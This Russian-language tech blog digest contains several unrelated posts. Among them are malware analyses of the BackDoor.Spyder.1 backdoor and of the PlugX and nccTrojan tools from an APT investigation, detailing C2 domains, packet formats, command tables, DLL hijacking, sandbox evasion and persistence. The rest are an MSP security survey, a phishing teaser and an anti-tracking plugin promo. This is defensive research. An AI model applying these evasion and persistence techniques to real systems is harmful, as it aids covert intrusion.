В функции set_global_funcs_by_callbacks происходит вызов каждой функции-инициализатора по очереди.

Общий порядок формирования структур выглядит следующим образом:

1) каждой функции передаются две структуры: первая содержит указатели на некоторые функции, вторая пустая;

2) каждая функция переносит указатели на функции из одной структуры в другую;

3) после вызова функции-инициализатора происходит очередное перемещение указателей на функции из локальной структуры в глобальный массив структур по определенному индексу.

В итоге после всех нестандартных преобразований получается некоторое количество глобальных структур, которые объединены в один массив.

В конечном итоге вызов функций можно представить следующим образом.

Сложные преобразования копирование локальных структур с функциями и их перенос в глобальные структуры вероятно, призваны усложнить анализ вредоносного образца.

Затем бэкдор при помощи библиотеки UT hash формирует хеш-таблицу служебных структур, ответственных за хранение контекста сетевого соединения, параметров подключения и т. д.

Фрагмент кода формирования хеш-таблицы.

Стоит отметить, что здесь располагается значение сигнатуры, которое позволяет определить используемую библиотеку: g_p_struc_10->hh.tbl->signature = 0xA0111FE1;.

Для рассматриваемого бэкдора характерно распределение значимых полей и данных по нескольким создаваемым для этого структурам. Эта особенность при анализе затрудняет создание осмысленных имен для структур.

После подготовительных действий переходит к инициализации подключения к управляющему серверу.

Инициализация соединения с управляющим сервером

После ряда подготовительных действий бэкдор разрешает хранящийся в конфигурации адрес управляющего сервера и извлекает порт. Адреса в конфигурации хранятся в виде строк: koran.junlper[.]com:80 и koran.junlper[.]com:443. Далее программа создает TCP-сокет для подключения. После этого создает контекст для защищенного соединения и выполняет TLS-рукопожатие.

После установки защищенного соединения бэкдор ожидает от управляющего сервера пакет с командой. Программа оперирует двумя форматами пакетов:

  • пакет, полученный после обработки протокола TLS, транспортный пакет;

  • пакет, полученный после обработки транспортного пакета, пакет данных. Содержит идентификатор команды и дополнительные данные.

Заголовок транспортного пакета представлен следующей структурой.

structtransport_packet_header{DWORDsignature;WORDcompressed_len;WORDuncompressed_len;};

Данные располагаются после заголовка и упакованы алгоритмом LZ4. Бэкдор проверяет значение поля signature, оно должно быть равно 0x573F0A68.

После распаковки полученный пакет данных имеет заголовок следующего формата.

structdata_packet_header{WORDtag;WORDid;WORDunk_0;BYTEupdate_data;BYTEid_part;DWORDunk_1;DWORDunk_2;DWORDlen;};

Поля tag и id в совокупности определяют действие бэкдора, то есть обозначают идентификатор команды.

Данные структуры заголовков используются в обоих направлениях взаимодействия.

Порядок обработки команд сервера:

  • верификация клиента;

  • отправка информации о зараженной системе;

  • обработка команд по идентификаторам.

В структуре, отвечающей за взаимодействие с управляющим сервером, есть переменная, которая хранит состояние диалога. В связи с этим перед непосредственным выполнением команд необходимо выполнение первых двух шагов, что можно рассматривать как второе рукопожатие.

Этап верификации

Для выполнения этапа верификации значения полей tag и id в полученном от управляющего сервера первичном пакете должны быть равны 1.

Процесс верификации состоит в следующем:

1. Бэкдор формирует буфер из 8-байтного массива, который следует после заголовка пакета и поля hash_id, взятого из конфигурации. Результат можно представить в виде структуры:

struct buff{BYTEpacket_data[8];BYTEhash_id[20];}

2. Вычисляется SHA1-хеш данных в полученном буфере, результат помещается в пакет (после заголовка) и отправляется на сервер.

Отправка информации о системе

Следующий полученный пакет от управляющего сервера должен иметь значения tag, равное 5, и id, равное 3. Данные о системе формируются в виде структуры sysinfo_packet_data.

structsession_info{DWORDid;DWORDState;DWORDClientBuildNumber;BYTEuser_name[64];BYTEclient_IPv4[20];BYTEWinStationName[32];BYTEdomain_name[64];};structsysinfo_block_2{WORDfield_0;WORDfield_2;WORDfield_4;WORDsystem_def_lang_id;WORDuser_def_lang_id;DWORDtimezone_bias;DWORDprocess_SessionID;BYTEuser_name[128];BYTEdomain_name[128];DWORDnumber_of_sessions;session_info sessions[number_of_sessions];};structsysinfo_block_1{DWORDunk_0;//0DWORDbot_id_created;DWORDdw_const_0;//0x101DWORDos_version;WORDdw_const_2;//0x200BYTEcpu_arch;BYTEfield_13;DWORDmain_interface_IP;BYTEMAC_address[20];BYTEbot_id[48];WCHARcomputer_name[128];BYTEcfg_string[64];WORDw_const;//2WORDsessions_size;};structsysinfo_packet_data{DWORDid;sysinfo_block_1 block_1;sysinfo_block_2 block_2;};

Поле sysinfo_packet_data.id содержит константу 0x19C0001.

Примечателен процесс определения бэкдором значений MAC-адреса и IP-адреса. Вначале программа ищет сетевой интерфейс, через который прошло наибольшее количество пакетов, затем получает его MAC-адрес и далее по нему ищет IP-адрес этого интерфейса.

Версия ОС кодируется значением от 1 до 13 (0, если возникла ошибка), начиная с 5.0 и далее по возрастанию версии.

В поле sysinfo_packet_data.block_1.cfg_string помещается значение string из конфигурации бэкдора, которое равно символу 1.

Обработка команд

После верификации и отправки системной информации BackDoor.Spyder.1 приступает к обработке главных команд. В отличие от большинства бэкдоров, команды которых имеют вполне конкретный характер (забрать файл, создать процесс и т. д.), в данном экземпляре они носят скорее служебный характер и отражают инструкции по хранению и структурированию получаемых данных. Фактически все эти служебные команды нацелены на загрузку новых модулей в PE-формате, их хранение и вызов тех или иных экспортируемых функций. Стоит отметить, что модули и информация о них хранятся в памяти в виде хеш-таблиц с помощью UT-hash.

tag

id

Описание

6

1

Отправить на сервер количество полученных модулей.

2

Сохранить в памяти параметры получаемого модуля.

3

Сохранить в памяти тело модуля.

4

Загрузить сохраненный ранее модуль. Поиск выполняется в хеш-таблице по идентификатору, полученному в пакете с командой. Модуль загружается в память, вызывается его точка входа, затем получаются адреса 4 экспортируемых функций, которые сохраняются в структуре для дальнейшего вызова. Вызвать экспортируемую функцию 1.

5

Вызвать экспортируемую функцию 4 одного из загруженных модулей, затем выгрузить его.

6

Отправить в ответ пакет, состоящий только из заголовка data_packet_header, в котором поле unk_2 равно 0xFFFFFFFF.

7

Вызвать экспортируемую функцию 2 одного из загруженных модулей.

8

Вызвать экспортируемую функцию 3 одного из загруженных модулей.

5

2

Отправить на сервер информацию о текущих параметрах подключения.

4

-

Предположительно экспортируемая функция 1 может возвращать таблицу указателей на функции, и по этой команде программа вызывает одну из данных функций.

После обработки каждого полученного от сервера пакета бэкдор проверяет разницу между двумя значениями результата GetTickCount. Если значение превышает заданное контрольное значение, то отправляет на сервер значение сигнатуры 0x573F0A68 без каких-либо дополнительных данных и преобразований.

Заключение

Рассмотренный образец бэкдора для целевых атак BackDoor.Spyder.1 примечателен в первую очередь тем, что его код не исполняет прямых вредоносных функций. Его основные задачи скрытое функционирование в зараженной системе и установление связи с управляющим сервером с последующим ожиданием команд операторов. При этом он имеет модульную структуру, что позволяет масштабировать его возможности, обеспечивая любую функциональность в зависимости от нужд атакующих. Наличие подключаемых плагинов роднит рассмотренный образец с ShadowPad и PlugX, что, вкупе с пересечениями сетевых инфраструктур, позволяет нам сделать вывод о его принадлежности к деятельности Winnti.

Подробнее..

Сервис-провайдеры в США и Великобритании хотят больше зарабатывать на безопасности

16.03.2021 16:20:24 | Автор: admin
Привет, Хабр! Поводом для сегодняшнего поста стало недавно проведенное при поддержке компании Acronis исследование Omdia (бывший Ovum) об отношении сервис-провайдеров к предоставлению сервисов защиты данных. Судя по ответам респондентов, MSP разных размеров стремятся решить проблему информационной безопасности за счет перехода на более интегрированные решения, одновременно зарабатывая больше денег на клиентских сервисах. Подробности исследования, а также некоторые наши выводы под катом.

image

В этом году специалисты Omdia провели опрос под названием Знакомство с рынком безопасности и резервного копирования данных для провайдеров управляемых услуг среди представителей 263 MSP из США (большинство) и Великобритании. Под прицел аналитиков попали MSP, которые уже внедрили или планируют развивать средства резервного копирования и обеспечения информационной безопасности в качестве сервисов. В опросе приняли участие компании различного размера работающие на разных рынках.

image
Размер MSP (количество сотрудников)

Ответы участников опроса показали, что большинство сервис-провайдеров используют набор устаревших решений для резервного копирования и обеспечения информационной безопасности. В частности, наличие различных (и не интегрированных между собой) систем резервного копирования, противодействия вредоносному ПО, управления конфигурациями, установки патчей, контроля удаленного доступа и прочих создает дополнительные проблемы для бизнеса. MSP сталкиваются со сложностью управления, лицензирования, оплаты услуг, развертывания, тестирования и поддержки процессов.

Тем не менее, отвечая на вопросы о своих планах на ближайший год, сервис-провайдеры отмечают стремление наращивать потенциал средств информационной безопасности и защиты данных, включая возможность автоматизированного резервного копирования и максимально быстрого аварийного восстановления. По словам аналитиков, это происходит потому, что бизнес по всему миру столкнулся за последние месяцы с небывалым объемом атак на удаленных сотрудников, безопасность которых намного проще обеспечить на стороне сервис-провайдера.
Пандемия COVID-19 привела к тому, что бизнес оказался в ситуации, подобной которой не было со времен Великого финансового кризиса и Великой депрессии 30-х годов прошлого века, отмечает Рой Иллсли, аналитик Omdia и один из ведущих авторов исследования. В таких условиях, когда организации сталкиваются с новой угрозой, к которой они плохо подготовлены, киберпреступность расцвела пышным цветом. Поэтому провайдерам управляемых услуг и их клиентами необходимо иметь возможность внедрять наиболее подходящие решения для борьбы со все более изощренными атаками.

Врезка: 89% опрошенных отметили необходимость обеспечивающих безопасность решений, функционал которых не ограничивался бы борьбой с вирусами и программами-вымогателями.

MSP в США планируют подтянуть уровень сервиса


На вопрос, какие сервисы в области защиты данных предлагают сервис-провайдеры или планируют внедрить в ближайшие 12 месяцев, большинство ответили, что стремятся к минимизации потерь данных, а также предлагают (или планируют предложить) возможности быстрого восстановления


Уже реализованные и запланированные сервисы ИБ для клиентов

На следующей диаграмме основные направления для улучшений. Респонденты отвечали на вопрос, в какие технологии они планируют инвестировать на протяжении ближайших 12 месяцев.

image
ТОП 3 направлений для повышения уровня безопасности на протяжении ближайших 12 месяцев

А на следующей диаграмме направления развития в области резервного копирования. Их всех вариантов ответа были выбраны те пункты, в которых максимальны отличия между уже имеющимися предложениями и запланированными на год внедрениями.

image
ТОП 3 плановых направлений улучшения резервного копирования на протяжении ближайших 12 месяцев.

Не все так просто препятствия к внедрению новых сервисов


Несмотря на очевидную потребность в улучшении качества сервиса с точки зрения киберзащиты, далеко не все MSP реализовали соответствующие программы для клиентов в полном объеме. Согласно результатам опроса, компании сталкиваются с одними и теми же препятствиями, которые мешать воплощению этих планов.

image

Основным камнем преткновения остается нехватка квалифицированных кадров. Согласно другому исследованию дефицит действительно готовых к работе специалистов ИБ на глобальном уровне достиг уже 4 миллионов. И поэтому не удивительно, что 92% MSP, принявших участие в опросе, отметили этот пункт как самое большое препятствие. По словам представителей сервис-провайдеров, для предоставления соответствующего сервиса необходимы простые в управлении продукты, эксплуатация которых не требует наличия глубоких ИТ-навыков.

Пункт Cannot make a business case означает, что провайдеры не могут подготовить подходящие пакеты услуг. Причина этому в недостаточной гибкости систем защиты, которые используются в сетях MSP на сегодняшний день.

Наконец, третья проблема это сложность управления слишком большим количеством поставщиков. Отсутствие интеграций и прозрачного взаимодействия ИБ-инструментов не позволяют сервис-провайдерам развивать единый подход к обеспечению безопасности своих клиентов, желающих получать сразу резервное копирование, антивирусную защиту, возможность удаленного управления, сервис фильтрации URL, сканер уязвимостей, систему управления патчами и многое другое.

Как результат, сервис провайдеры отмечают свою неспособность справиться с самыми современными угрозами. С небольшим различием в процентах эта проблема характерна для MSP самого разного размера.

image

Технические задачи


Учитывая все сказанное выше, сервис-провайдеры ставят перед своими ИТ-отделами целый спектр технических задач. Опрос показал, что среди них можно выделить три наиболее злободневные:

image

Современный ландшафт киберугроз включает в себя значительное количество угроз нулевого дня. Устаревшие системы защиты не могут обеспечить высокий уровень киберзащиты. Для предоставления качественного сервиса своим клиентам сервис-провайдерам (по их словам) необходимо:

  1. Раннее обнаружение атак и изоляция вредоносной активности. Для этого в современных решениях используются технологии искусственного интеллекта для защиты от Ransomware и других угроз. Наличие встроенных систем анализа уязвимостей, а также восстановления работы систем являются большим плюсом.
  2. Повсеместное шифрование Реальное положение дел с современными угрозами требует повсеместного шифрования данных находятся ли они на стороне пользователя, в хранилище или передаются по защищенному каналу. При этом необходимо наличие защиты пользовательским паролем, чтобы каждый клиент мог быть уверен в безопасности своих данных.
  3. Сканирование уязвимостей в реальном времени Заказчики используют разрозненные системы защиты, и это проблема 84% опрошенных подтвердили, что обеспечение различных аспектов безопасности разными вендорами и поставщиками затрудняет работу. Вместо множества инструментов MSP хотят получить единые средства ИБ, которые также включат в себя возможности мониторинга уязвимостей CVEs (Common Vulnerabilities and Exposures), а также контроля установки патчей. В число наиболее популярных систем и приложений входят продукты Microsoft, Adobe, Oracle, Java, все виды браузеров и многие другие приложения.

Старые системы безопасности как чемодан без ручки


Исследование Omdia показало, что в США и Великобритании сервис провайдеры очень хотят выйти на новый уровень предоставления сервисов киберзащиты для своих клиентов. Однако при этом они сталкиваются с большим количеством сложностей, в основном, обусловленных низким уровнем подготовки кадров (и дефицитом высококвалифицированных ИБ-специалистов), а также проблемами построения современных сервисов на базе унаследованных технологий. Согласно исследованию Omdia, экономия средств является для провайдеров управляемых услуг ключевым фактором. 92% респондентов говорят о том, что приобретение навыков и опыта для предоставления услуг безопасности является серьезной бизнес-задачей, поскольку доступные в настоящий момент услуги дороги и их ассортимент невелик.

Решение этой проблемы над которым сегодня работает вся отрасль и компания Acronis в частности создание интегрированных систем, которые позволяли бы реализовать автоматизированное резервное копирование, управление патчами, противодействие вредоносному ПО, распознавание Ransomware, изоляцию угроз и так далее. Внедрение подобных продуктов поможет MSP в построении гибких и адаптивных сервисов ИБ для конечных заказчиков, одновременно с сокращением затрат на поддержку и обслуживание, а также снижением нагрузки на ИТ-персонал.
Подробнее..

Recovery mode Фишинг и с чем его едят

18.03.2021 20:06:33 | Автор: admin

Почти каждый из нас слышал это страшное слово, но далеко не каждый понимает, что же это такое

Подробнее..

Recovery mode Nemezida DNT

26.03.2021 22:10:30 | Автор: admin

Большинство интернет-компаний в сети отслеживают не только личную жизнь пользователей, но и корпоративные данные сотрудников и собирают излишнюю информацию.

Это происходит без четкого контроля, что с этими данными в дальнейшем происходит и кто получает к ним доступ.

Так-как большинство программ, с помощью которых пользователь использует интернет, сами собирают информацию о пользователях, необходимо быть уверенным в выбранном решении и отсутствии незапротоколированных возможностей.

В этом посте хотим рассказать о стартапе который хочет решить эту задачу.

Nemezida DNT плагин, направленный на защиту пользователя и устройства от сбора информации, выполняющий функции проверки сайтов на наличие вредоносного кода и их репутации.

Проект Nemezida DNT занял призовое место в недавно завершившемся Хакатоне Demhack 2, посвященному теме Приватность и доступность информации.

На текущий момент стартап имеет довольно ограниченный набор функций, но у его разработчиков большие планы и планируется увеличение функционала в несколько раз.

Принцип работы плагина заключается в том, что когда пользователь со своего устройства осуществляет сёрфинг в сети интернет, посещаемые ресурсы пытаются вытащить из устройства, как можно больше данных о нем и о пользователе, плагин осуществляет подмену этих данных на очень похожие, что помогает обойти плагину обнаружение со стороны различных сервисов, помимо прочего, плагин осуществляет блокировку отправки информации, которую он подменить не может.

На данном этапе у продукта следующие функции:

Режим защиты "Перископная":

- Fingerprint;

Режим защиты Рабочая:

- Fingerprint;

- Cookie.

Режим защиты Предельная:

- Fingerprint;

- Cookie;

- Geo;

- Антивирусная проверка ссылок;

- Подмена информации об установленных плагинах;

- Проверка репутации посещенных сайтов.

На картинке снизу Вы можете увидеть интерфейс данной разработки. При нажатии на кнопку "Пуск" происходит погружение батискафа в воду. что говорит о том, что плагин начал свою работу.

При переходе в режим "Настройки", пользователь может выбрать один из трех режимов работы.

Помимо прочего, плагин имеет режим обратной связи с разработчиками, что позволяет своевременно решать возникшие вопросы по продукту.

Работа плагина поддерживается в нескольких десятках браузерах, например, в таких, как: "Google Chrome, Яндекс Браузер, Opera и других ".

Плагин помогает частично обеспечить исполнение 23 статьи Конституции РФ и пунктов 152 ФЗ О персональных данных и Европейского закона о защите персональных данных "GDPR", таким образом решение нацелено защитить не только домашнего, но и корпоративного пользователя.

В будущем стартап хочет глубже проработать вопрос защиты персональных данных, коммерческой и конфиденциальной информации.

А, как думаете, Nemezida DNT мог бы быть полезен домашним и корпоративным пользователям? Какие бы хотели видеть функции? Давайте подискутируем в комментариях.

Подробнее..

Пока расследование не разлучит нас малварь, которая может сидеть в сети компании годами

02.04.2021 12:23:26 | Автор: admin

Недавно мы расследовали АРТ-атаку на одну российскую компанию и нашли много занятного софта. Сначала мы обнаружили продвинутый бэкдор PlugX, популярный у китайских группировок, АРТ-атаки которых обычно нацелены на похищение конфиденциальной информации, а не денег. Затем из скомпрометированной сети удалось вытащить несколько других схожих между собой бэкдоров (nccTrojan, dnsTrojan, dloTrojan) и даже общедоступных утилит.


Программы, используемые в этой преступной кампании, не отличаются сложностью, за исключением, может быть, PlugX. К тому же три из четырех вредоносов использовали при запуске давно известную технику DLL hijacking. Тем не менее, как показало наше исследование, даже при таких условиях злоумышленники могут годами оставаться в скомпрометированных сетях.


Мы решили изучить обнаруженный софт и поделиться своими наблюдениями.


PlugX


PlugX сложная вредоносная программа. Мы постараемся рассказать о ее основных функциях, а более подробное описание малвари можно найти в отчете Dr. Web.


Запуск PlugX


PlugX, как правило, распространяется в виде самораспаковывающихся архивов, содержащих:


  • невредоносный исполняемый файл (EXE), подписанный цифровой подписью (нам попадались подписи McAfee, Kaspersky, Support.com);
  • вредоносную динамическую библиотеку (Dynamic Link Library DLL);
  • зашифрованную основную нагрузку файлы с произвольными именем и расширением.

Такой набор характерен для техники DLL hijacking, при которой злоумышленник заменяет легитимную DLL на вредоносную. При этом малварь получает возможность работать от имени легитимного процесса и обходить таким образом средства защиты (рис. 1).



Рис. 1. Наглядное представление техники DLL hijacking


Рассмотрим в качестве примера один из экземпляров PlugX, характеристики которого приведены в табл. 1.


Табл. 1. Свойства файлов одного из образцов PlugX
Свойство EXE DLL Зашифрованная нагрузка
Имя файла mcut.exe mcutil.dll mcutil.dll.bbc
Тип файла PE32 executable (EXE) PE32 executable (DLL) None
Размер (в байтах) 140 576 4 096 180 358
Время компиляции 13 июня 2008 года 02:39:28 9 декабря 2014 года 10:06:14
MD5 884d46c01c762ad6ddd2759fd921bf71 e9a1482a159d32ae57b3a9548fe8edec 2d66d86a28cd28bd98496327313b4343
SHA-1 d201b130232e0ea411daa23c1ba2892fe6468712 a2a6f813e2276c8a789200c0e9a8c71c57a5f2d6 7bcf4f196578f2a43a2cd47f0b3c8d295120b646
SHA-256 3124fcb79da0bdf9d0d1995e37b06f7929d83c1c4b60e38c104743be71170efe 2f81cf43ef02a4170683307f99159c8e2e4014eded6aa5fc4ee82078228f6c3c 0c831e5c3aecab14fe98ff4f3270d9ec1db237f075cd1fae85b7ffaf0eb2751

Вот что происходит при запуске невредоносного исполняемого файла (EXE) из пакета.


Сначала одна из импортируемых им библиотек (отдельная DLL) заменяется вредоносной. После загрузки в память процесса DLL открывает третий файл из пакета PlugX, который обходит средства защиты за счет отсутствия видимого исполняемого кода. Тем не менее он содержит шелл-код, после исполнения которого в памяти расшифровывается еще один дополнительный шелл-код. Он с помощью функции RtlDecompressBuffer() распаковывает PlugX (DLL). При открытии мы видим, что сигнатуры MZ и PE в исполняемом файле PlugX заменены на XV (рис. 2) скорее всего, это тоже нужно, чтобы скрыть модуль от средств защиты.



Рис. 2. Исполняемый файл PlugX в распакованном виде с измененными сигнатурами MZ и PE


Наконец, запускается распакованная вредоносная библиотека, и управление передается ей.


В другом экземпляре PlugX мы обнаружили интересную особенность: малварь пыталась скрыть некоторые библиотечные вызовы от песочниц. При восстановлении импортов вместо адреса импортируемой функции сохранялся адрес тремя байтами ранее. Результат для функции SetFileAttributesW() виден на рис. 3.



Рис. 3. При получении адреса функции SetFileAttributesW() сохраняется адрес 0x7577D4F4


В табл. 2 приведены характеристики этого экземпляра.


Табл. 2. Свойства файлов образца вредоносной программы PlugX, который пытался скрыть вызовы от песочниц
Свойство EXE DLL Зашифрованная нагрузка
Имя файла mcut.exe mcutil.dll mcutil.dll.bbc
Тип файла PE32 executable (EXE) PE32 executable (DLL) None
Размер 140 576 4 096 179 906
MD5 884d46c01c762ad6ddd2759fd921bf71 12ee1f96fb17e25e2305bd6a1ddc2de9 e0ae93f9cebcba2cb44cec23993b8917
SHA-1 d201b130232e0ea411daa23c1ba2892fe6468712 bf25f1585d521bfba0c42992a6df5ac48285d763 f0efdb723a65e90afaebd56abe69d9f649ca094c
SHA-256 3124fcb79da0bdf9d0d1995e37b06f7929d83c1c4b60e38c104743be71170efe 97ad6e95e219c22d71129285299c4717358844b90860bb7ab16c5178da3f1686 81e53c7d7c8aa8f98c951106a656dbe9c931de465022f6bafa780a6ba96751eb

На рис. 4 представлен фрагмент кода PlugX, где встречается функция SetFileAttributesW(), и листинг из одной из песочниц.



а)



б)
Рис. 4. Фрагмент декомпилированного кода (а) и соответствующий ему фрагмент листинга перехваченных инструкций (б), где встречается вызов функции SetFileAttributesW()


В листинге из песочницы мы не видим вызов функции SetFileAttributesW(). Впрочем, вызовы функций LoadLibrary() и GetProcAddress(), которые были импортированы аналогичным образом, мы тоже не видим.


Основная нагрузка PlugX не сохраняется в расшифрованном виде на диске.


Работа PlugX


После запуска вредоносная программа расшифровывает конфигурацию, которая содержит адреса серверов управления, а также информацию, необходимую для дальнейшего функционирования (например, способ закрепления в системе или путь, по которому копируются файлы малвари).


При этом данные для конфигурации могут браться из основного загрузчика или из отдельного файла в текущей рабочей директории. Из того же файла может быть подтянута новая конфигурация при ее обновлении в ходе взаимодействия с сервером управления.


То, как вредонос будет вести себя дальше, во многом определяет его конфигурация.


В зависимости от значения check_flag в конфигурации PlugX вредоносная программа может начать поиск в зараженной системе сетевого адаптера, MAC-адрес которого совпадает с адресом, заданным в самой малвари. В случае совпадения вредоносная программа завершит свое исполнение. Вероятно, таким образом она пытается обнаружить виртуальную среду.


Режим работы вредоносной программы зависит от значения флага конфигурации mode_flag, которое может быть равно 0, 2, 3 или 4.


Если значение mode_flag равно 0, вредоносная программа закрепляется в системе (подробнее в разделе Закрепление в системе). Затем она переходит к инициализации плагинов и взаимодействию с сервером управления (подробнее в разделе Функциональность плагинов и исполнение команд).


Если значение mode_flag равно 2, вредоносная программа сразу переходит к инициализации плагинов и взаимодействию с сервером управления.


Если значение mode_flag равно 3, вредоносная программа внедряет шелл-код в Internet Explorer. Передача управления вредоносному коду осуществляется с помощью функции CreateRemoteThread(). Также производится инициализация плагинов, и создается именованный пайп, через который вредоносная программа получает команды, предназначенные для исполнения плагинами.


Если значение mode_flag равно 4, устанавливается перехват некоторых функций библиотеки wininet.dll. В функции-перехватчике извлекаются логины и пароли для подключения к прокси-серверу. Полученные данные будут сохранены в файле в рабочей директории вредоносной программы. При этом имена файлов, создаваемых малварью в процессе функционирования, генерируются на основе серийного номера диска и некоторого уникального для каждого файла значения. Перехватываются следующие функции:


  • HttpSendRequestA(),
  • HttpSendRequestW(),
  • HttpSendRequestExA(),
  • HttpSendRequestExW().

Закрепление в системе


Если конфигурация PlugX предусматривает закрепление вредоноса в зараженной системе, то в ней прописан каталог, в который будут скопированы компоненты малвари.


Анализируемый образец выбирает одну из следующих директорий в зависимости от разрядности малвари:


  • %SystemRoot%\System32\winssxs,
  • %SystemRoot%\SysWOW64\winssxs.

Для созданной директории и скопированных в нее компонентов программа пытается установить временные метки, совпадающие с временными метками библиотеки ntdll.dll из зараженной системы. Возможно, это нужно для маскировки под компонент ОС. Также PlugX скрывает эти файлы от пользователя, выставляя атрибуты FILE_ATTRIBUTE_SYSTEM и FILE_ATTRIBUTE_HIDDEN. В конфигурации указывается путь к месту, где будут сохраняться скриншоты, сделанные вредоносной программой.


В зависимости от persistence_flag PlugX может закрепляться:


  • как сервис (persistence_flag=1),
  • через реестр (persistence_flag=2),
  • любым из двух способов (persistence_flag=0), сначала попытаться создать сервис, а в случае неудачи закрепиться через реестр.

Помним, что малварь может и не закрепляться вовсе.


Когда вредонос пытается закрепиться как сервис, он маскируется под легитимную программу. Имя службы и ее параметры задаются в конфигурации. Например, в нашем образце создается сервис с именем SSXSS (отображаемое имя SSXS) и описанием McAfee OEM Info Copy Files, а качестве исполняемого файла службы используется невредоносный mcut.exe.


Если закрепиться в качестве службы не удается, программа пытается закрепиться через реестр и перезапускает себя из каталога, в который была скопирована ранее. Для этого она использует ключ реестра HKCU\Software\Microsoft\Windows\CurrentVersion\Run. Ключ реестра и параметр задаются через конфигурацию: в анализируемом образце в параметр, соответствующий отображаемому имени сервиса, программа прописывает путь до того же mcut.exe.


После того, как вредоносная программа закрепилась и перезапустилась, производится внедрение вредоносного кода. В анализируемом образце он работает в памяти легитимного процесса svchost.exe. Имя процесса подтягивается из конфигурации. Если внедрение кода прошло успешно, текущий процесс завершается.


В зависимости от конфигурации вредоносная программа может также попытаться создать процесс с повышенными привилегиями с последующим внедрением в него кода. В конфигурации могут быть перечислены до четырех целевых процессов.


Функциональность плагинов PlugX и исполняемые команды


Основная функциональность бэкдора реализована с помощью так называемых плагинов. Фрагмент функции, в которой производится инициализация плагинов, приведен на рис. 5.



Рис. 5. Фрагмент инициализации плагинов PlugX


PlugX может управлять процессами и службами, работать с файловой системой, вносить изменения в реестр. Он также имеет компоненты кейлоггера и скринлоггера и может получать удаленный доступ к зараженной системе все это дает обширные возможности злоумышленникам в скомпрометированной сети.


Полный перечень функций вредоносной программы, доступной через плагины, приведен в табл. 3.


Табл. 3. Функциональность PlugX, доступная через плагины


Плагин Команда Функциональные возможности
DISK
0x3000
Собрать информацию по всем дискам (тип и свободное пространство)
0x3001
Перечислить файлы в директории
0x3002
Перечислить файлы
0x3004
Прочитать файл
0x3007
Создать директорию и сохранить в нее файл
0x300A
Создать директорию
0x300C
Создать новый рабочий стол и запустить процесс
0x300D
Копировать, переместить, переименовывать или удалить файл
0x300E
Получить значение переменной окружения
KeyLogger
0xE000
Отправить данные кейлоггера на сервер управления
Nethood
0xA000
Перечислить сетевые ресурсы
0xA001
Установить соединение с сетевым ресурсом
Netstat
0xD000
Получить таблицу TCP
0xD001
Получить таблицу UDP
0xD002
Установить состояние TCP
Option
0x2000
Заблокировать экран компьютера
0x2001
Отключить компьютер (принудительно)
0x2002
Перезагрузить компьютер
0x2003
Отключить компьютер (безопасно)
0x2005
Показать окно с сообщением
PortMap
0xB000
Возможно, запустить маппинг портов
Process
0x5000
Получить информацию о процессах
0x5001
Получить информацию о процессе и модулях
0x5002
Завершить процесс
Regedit
0x9000
Перечислить подразделы ключа реестра
0x9001
Создать ключ реестра
0x9002
Удалить ключ реестра
0x9003
Скопировать ключ реестра
0x9004
Перечислить значения ключа реестра
0x9005
Задать значение ключа реестра
0x9006
Удалить значение из ключа реестра
0x9007
Получить значение из ключа реестра
Screen
0x4000
Использовать удаленный рабочий стол
0x4100
Сделать скриншот
0x4200
Найти скриншоты в системе
Service
0x6000
Получить информацию о сервисах в системе
0x6001
Изменить конфигурацию сервиса
0x6002
Запустить сервис
0x6003
Управлять сервисом
0x6004
Удалить сервис
Shell
0x7002
Запустить cmd-шелл
SQL
0xC000
Получить список баз данных
0xC001
Получить список описаний драйверов
0xC002
Выполнить SQL-команду
Telnet
0x7100
Настроить Telnet

Фрагмент функции обработки команд, полученных от сервера управления приведена на рис. 6.



Рис. 6. Команды сервера управления, которые получает PlugX


Описание команд приведено в табл. 4.


Табл. 4. Команды сервера управления, которые получает PlugX


Команда Описание
0x1 Отправить на сервер управления данные о зараженной системе:
имя компьютера;
имя пользователя;
информация о CPU;
текущее использование памяти системой;
информация об операционной системе;
системные дата и время;
системная информация;
язык системы
0x5 Самоудалиться (удалить службу, очистить реестр)
0x3 Передать команды плагинам со сменой протокола взаимодействия
0x6 Отправить текущую конфигурацию PlugX на сервер управления
0x7 Получить с сервера управления новую конфигурацию и обновить текущую
0x8 Отправить список процессов с внедренным шелл-кодом
default Передать команды плагинам

nccTrojan


Один из обнаруженных нами бэкдоров найден в отчете VIRUS BULLETIN и назван авторами nccTrojan по константному значению в коде основного пейлоада. Характеристики попавшегося нам образца малвари приведены в табл. 5.


Табл. 5. Свойства анализируемого образца nccTrojan
Свойство EXE DLL
Имя файла instsrv.exe windowsreskits.dll
Тип файла PE32 executable (EXE) PE32 executable (DLL)
Размер (в байтах) 83 968 514 048
Время компиляции 18 декабря 2019 года 03:13:03 21 марта 2020 года 15:19:04
MD5 c999b26e4e3f15f94771326159c9b8f9 056078b1c424667e6a67f9867627f621
SHA-1 ec12c469463029861bd710aec3cb4a2c01907ad2 5bd080285a09c0abf742fb50957831310d9d9769
SHA-256 07d728aa996d48415f64bac640f330a28e551cd565f1c5249195477ccf7ecfc5 3be516735bafbb02ba71d56d35aee8ce2ef403d08a4dc47b46d5be96ac342bc9

Запуск nccTrojan


Вредоносная программа состоит из двух файлов: EXE и DLL, но в данном случае техника DLL hijacking не используется. После запуска вредоносный EXE-файл (MD5: c999b26e4e3f15f94771326159c9b8f9) регистрирует библиотеку windowsreskits.dll (MD5: 056078b1c424667e6a67f9867627f621) в качестве сервиса. В зависимости от разрядности библиотеки ее файл копируется в одну из директорий:


  • %SystemRoot%\System32;
  • %SystemRoot%\SysWOW64 .

В результате создается сервис с именем WindowsResKits, работающий в контексте процесса svchost.exe.


Работа nccTrojan


nccTrojan расшифровывает конфигурацию, хранящуюся по определенному смещению в оверлее. Конфигурация зашифрована с помощью алгоритма AES-CFB-256, он же используется для шифрования взаимодействия с сервером управления. Пары ключ шифрования + вектор инициализации захардкоржены и различны для шифрования конфигурации и взаимодействия с сервером управления.


Расшифрованная конфигурация содержит информацию о сервере управления и выглядит следующим образом:


***news.niiriip.com|#|none|#|none|#|443|#|none|#|none|#|passwd|#|ncc|#|v2.2[Service]***


Строка v2_2[Service], вероятнее всего, характеризует версию вредоносной программы и также используется в качестве имени при создании мьютекса.


В зависимости от конфигурации nccTrojan может иметь до трех серверов управления. В исследуемом экземпляре вредоносной программы задан лишь один сервер управления news.niiriip[.]com, а поля конфигурации под оставшиеся два заполнены none.


Дальнейшее взаимодействие осуществляется только в случае получения с сервера управления пакета, который после расшифровывания содержит строку ncc.


Если соединение установлено, то на сервер управления отправляется следующая информация:


  • имя компьютера,
  • контрольная сумма от отправляемых данных,
  • имя пользователя,
